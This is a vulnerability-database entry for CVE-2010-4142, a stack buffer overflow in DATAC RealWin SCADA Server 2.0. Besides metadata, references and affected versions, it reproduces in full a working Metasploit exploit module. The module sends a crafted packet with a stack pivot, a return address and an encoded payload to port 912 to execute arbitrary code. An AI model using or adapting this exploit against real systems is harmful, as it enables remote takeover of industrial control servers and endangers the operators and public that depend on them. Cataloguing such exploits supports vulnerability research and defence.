Details of VAR-E-201010-0133

ID

VAR-E-201010-0133

CVE

cve_id:

CVE-2010-4142

Trust: 2.4

sources: BID: 44150 // PACKETSTORM: 96096 // EXPLOIT-DB: 16384 // EDBNET: 39077

EDB ID

16384

TITLE

DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - SCPC_TXTEVENT Buffer Overflow (Metasploit) - Windows remote Exploit

Trust: 0.6

sources: EXPLOIT-DB: 16384

DESCRIPTION

DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - SCPC_TXTEVENT Buffer Overflow (Metasploit). CVE-2010-4142CVE-68812 . remote exploit for Windows platform

Trust: 0.6

sources: EXPLOIT-DB: 16384

AFFECTED PRODUCTS

vendor:	datac	model:	realwin scada server (build	scope:	eq	version:	2.06.1.8.10)	Trust: 1.6
vendor:	datac	model:	realwin scada server scpc txtevent	scope:	-	version:	-	Trust: 0.5
vendor:	datac	model:	control international realwin scada server	scope:	eq	version:	2.0	Trust: 0.3
vendor:	datac	model:	control international realwin scada server	scope:	eq	version:	1.06	Trust: 0.3
vendor:	datac	model:	control international realwin scada server	scope:	ne	version:	2.1.10	Trust: 0.3

sources: BID: 44150 // PACKETSTORM: 96096 // EXPLOIT-DB: 16384 // EDBNET: 39077

EXPLOIT

##
# $Id: realwin_scpc_txtevent.rb 11125 2010-11-24 13:44:46Z mc $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking

include Msf::Exploit::Remote::Tcp

def initialize(info = {})
super(update_info(info,
'Name' => 'DATAC RealWin SCADA Server SCPC_TXTEVENT Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in DATAC Control
International RealWin SCADA Server 2.0 (Build 6.1.8.10).
By sending a specially crafted packet,
an attacker may be able to execute arbitrary code.
},
'Author' => [ 'Luigi Auriemma', 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 11125 $',
'References' =>
[
[ 'CVE', '2010-4142'],
[ 'OSVDB', '68812'],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 550,
'BadChars' => "\x00\x20\x0a\x0d",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Universal', { 'Pivot' => 0x40017fc2, 'Ret' => 0x4001f6d0 } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Nov 18 2010'))

register_options([Opt::RPORT(912)], self.class)
end

def exploit

connect

data = [0x6a541264].pack('V')
data << [0x00000010].pack('V')
data << [0x00001ff4].pack('V')
data << rand_text_alpha_upper(164)
data << [target['Pivot']].pack('V')
data << rand_text_alpha_upper(16)
data << [target.ret].pack('V')
data << payload.encoded
data << rand_text_alpha_upper(10024 - payload.encoded.length)

print_status("Trying target #{target.name}...")
sock.put(data)

handler
disconnect

end

Trust: 1.0

sources: EXPLOIT-DB: 16384

EXPLOIT LANGUAGE

Trust: 0.6

sources: EXPLOIT-DB: 16384

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 16384

TYPE

SCPC_TXTEVENT Buffer Overflow (Metasploit)

Trust: 1.0

sources: EXPLOIT-DB: 16384

CREDITS

Metasploit

Trust: 0.6

sources: EXPLOIT-DB: 16384

EXTERNAL IDS

db:	NVD	id:	CVE-2010-4142	Trust: 2.4
db:	EXPLOIT-DB	id:	16384	Trust: 1.6
db:	EDBNET	id:	39077	Trust: 0.6
db:	PACKETSTORM	id:	96096	Trust: 0.5
db:	CERT/CC	id:	VU#222657	Trust: 0.3
db:	BID	id:	44150	Trust: 0.3

sources: BID: 44150 // PACKETSTORM: 96096 // EXPLOIT-DB: 16384 // EDBNET: 39077

REFERENCES

url:	https://nvd.nist.gov/vuln/detail/cve-2010-4142	Trust: 2.1
url:	https://www.exploit-db.com/exploits/16384/	Trust: 0.6
url:	http://aluigi.altervista.org/adv/realwin_1-adv.txt	Trust: 0.3
url:	http://www.dataconline.com/software/realwin.php	Trust: 0.3
url:	http://www.realflex.com	Trust: 0.3
url:	http://www.realflex.com/	Trust: 0.3
url:	http://www.kb.cert.org/vuls/id/222657	Trust: 0.3

sources: BID: 44150 // PACKETSTORM: 96096 // EXPLOIT-DB: 16384 // EDBNET: 39077

SOURCES

db:	BID	id:	44150
db:	PACKETSTORM	id:	96096
db:	EXPLOIT-DB	id:	16384
db:	EDBNET	id:	39077

LAST UPDATE DATE

2022-07-27T09:16:23.533000+00:00

SOURCES UPDATE DATE

db:

BID

id:

44150

date:

2010-11-19T18:26:00

SOURCES RELEASE DATE

db:	BID	id:	44150	date:	2010-10-15T00:00:00
db:	PACKETSTORM	id:	96096	date:	2010-11-24T22:57:50
db:	EXPLOIT-DB	id:	16384	date:	2010-11-24T00:00:00
db:	EDBNET	id:	39077	date:	2010-11-24T00:00:00

tag:	Metasploit Framework (MSF)	Trust: 1.0
tag:	exploit	Trust: 0.5
tag:	overflow	Trust: 0.5
tag:	arbitrary	Trust: 0.5

ID

CVE

EDB ID

TITLE

DESCRIPTION

AFFECTED PRODUCTS

EXPLOIT

EXPLOIT LANGUAGE

PRICE

TYPE

TAGS

CREDITS

EXTERNAL IDS

REFERENCES

SOURCES

LAST UPDATE DATE

SOURCES UPDATE DATE

SOURCES RELEASE DATE